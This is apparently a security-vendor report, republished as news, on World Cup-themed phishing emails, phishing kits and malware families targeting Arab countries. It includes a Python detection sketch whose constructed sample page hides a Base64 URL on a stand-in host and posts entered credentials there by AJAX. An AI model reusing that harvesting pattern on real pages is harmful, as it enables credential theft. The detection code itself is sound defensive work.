Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament


By VARINDIA - 2022-11-21

By: Daksh Kapur, Sparsh Jain
 

Global eyes will soon turn to the first global football tournament to be held in the Arab world, but malicious actors have already kicked off World Cup-themed cyberattacks. Email security researchers from the Trellix Advanced Research Center have found attackers leveraging FIFA and football-based campaigns to target organizations in Arab countries. It is common practice for attackers to use important or popular events in their social engineering tactics, and in particular to target organizations related to the event, which are the more promising victims for such an attack.


As seen in the above graph, the volume of malicious emails in Arab countries was observed to have increased by 100% in the month of October. As the host country and the affiliated organizations prepare for the event, attackers take advantage of employees’ busy schedules, which increase the chances of human error and of a victim interacting with the attack vector. The aims of such attacks vary and include financial fraud, credential harvesting, data exfiltration, surveillance, or damage to the country’s or organization’s reputation.

 

Malicious Emails

Trellix Advanced Research Center researchers caught various emails utilizing the football tournament as an initial attack vector. The following are cases of samples found in the wild:

Sample 1: Pretends to be from the FIFA TMS helpdesk. The email body shows a fake alert notification regarding the deactivation of two-factor authentication and contains a hyperlink which redirects the user to a phishing page.

Sample 2: Attempts to impersonate David Firisua, the team manager for Auckland City FC, and seeks confirmation of a payment made to the receiver's account in reference to FIFA. It also contains a hyperlink to a customized phishing page of a trusted brand.

Sample 3: Impersonates the FIFA ticketing office and conveys a payment issue for the victim to urgently resolve. It also contains an HTML attachment which redirects the user to a customized phishing page.

Sample 4: A fake legal notification that informs the recipient of a FIFA ban on registering new players, to create a sense of urgency. It also contains an HTML attachment which redirects the user to a customized phishing page.

Sample 5: A fake file notification set in WeTransfer’s template. It attempts to impersonate the Players Status Department and sends victims a legal notice regarding delayed legal fees. It contains a link which redirects the user to a malicious website either delivering malware or hosting a phishing page.

Sample 6: Snoonu, the official food delivery partner of the World Cup, is spoofed, offering fake free tickets to those who register. It contains a malicious XLSM attachment. The usage of such trusted organizations' names and their templates makes the user fall for such attacks easily.

 

These are just some of the campaigns we have found. Trellix Email Security was able to successfully detect multiple campaigns and safeguard users from any kind of breach or loss tied to these campaigns.

 


 

Figure 3 – Football-Themed Malicious Emails

 

Malicious URLs

The following are some of the tournament-themed phishing pages caught by Trellix Email Security being distributed in the wild:

 

Customized pages that appear to be genuine and look like the legitimate pages they spoof make it difficult for the victim to recognize any suspicious activity.

Multiple phishing kits are used in which the post URL is either obfuscated, Base64-encoded, or placed in the AJAX request instead of the form action tags.

Credentials are posted to a PHP script hosted on the server managed by the attacker.

Figure 4 – Tournament-Themed Malicious URLs
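A static triage sketch for the three phishing-kit traits listed above, applied to an HTML attachment or saved page. This is an added example, not Trellix's detection logic; `triage_html`, the finding names, and the sample page with its `collector.example` URL are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
AJAX_RE = re.compile(r"\$\.(?:ajax|post)\s*\(|XMLHttpRequest|\bfetch\s*\(", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)

# Constructed sample (not from the campaigns): no form action, Base64 post URL, AJAX submit.
SAMPLE = (
    '<form id="f"><input name="u"><input type="password" name="p"></form>'
    '<script>var t = atob("%s");'
    '$.ajax({url: t, type: "POST", data: $("#f").serialize()});</script>'
) % base64.b64encode(b"https://collector.example/post.php").decode()


class FormScan(HTMLParser):
    """Collects every form's action attribute and notes any password input."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append((a.get("action") or "").strip())
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def triage_html(html):
    """Return sorted heuristic findings for one HTML attachment."""
    p = FormScan()
    p.feed(html)
    js = "\n".join(SCRIPT_RE.findall(html))
    findings = set()
    if p.has_password and not any(a and a != "#" for a in p.actions):
        findings.add("password-field-without-form-action")
    if p.has_password and AJAX_RE.search(js):
        findings.add("credentials-sent-by-script-request")
    for blob in B64_RE.findall(js):
        pad = "=" * (-len(blob) % 4)
        try:
            text = base64.b64decode(blob + pad).decode("utf-8", "ignore")
        except ValueError:  # not valid Base64 after all
            continue
        if URL_RE.match(text):
            findings.add("base64-encoded-url-in-script")
    return sorted(findings)
```

These are heuristics for ranking attachments for review: legitimate login pages also submit by script, so a single finding is a signal rather than a verdict.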

 

Malware

Trellix solutions have identified several malware families being used to target Arab countries. The top five malware families based on the volume of the attacks include:

Qakbot: An information stealer and banking Trojan with backdoor capabilities. It inserts malicious replies into the middle of existing email conversations, using the compromised accounts of other infection victims.

Emotet: An advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch a payload. The goal is to access foreign devices and spy on sensitive confidential data.

Formbook: An infostealer malware which is used to steal several types of data from infected systems, including credentials cached in web browsers, screenshots, and keystrokes. It can also act as a downloader, enabling it to download and execute additional malicious files.

Remcos: Remote access software used to remotely control computers. Once installed, it opens a backdoor on the computer, granting full access to the remote user.

QuadAgent: A PowerShell backdoor, and another tool used by the OilRig group to perform attacks on targeted machines.

 

Figure 5 – Top 5 Malware Families Used to Target Arab Countries

 

Indicators of compromise

 

The following link contains examples of malicious URLs, binaries and email addresses used in the recent campaigns targeting Arab Countries.

Trellix protection

Trellix Email Security provides reliable detection of such campaigns by preventing emails from ever reaching your system. In addition, Trellix also detects campaigns on other levels like network, URL and binary to provide complete protection to our customers.

The following are some of the many rules authored by us to detect such campaigns:

 

FE_Trojan_HTM_Phish_246

Phishing_Null_Content_33

Phishing_Qbot

Phishing_Qbot_Zip_Expiry

 

Conclusion

As the much-awaited football tournament comes close, cybercriminals are expected to leverage every opportunity they get to capitalize on news trends, ticket demand, human errors due to busy schedules and more in order to deliver a cyberattack. We anticipate these attacks to continue through January 2023 and would advise everyone to stay vigilant against any attack vectors. Organizations directly related to the event are advised to stay extra vigilant, as they would be the most promising targets for such attacks.
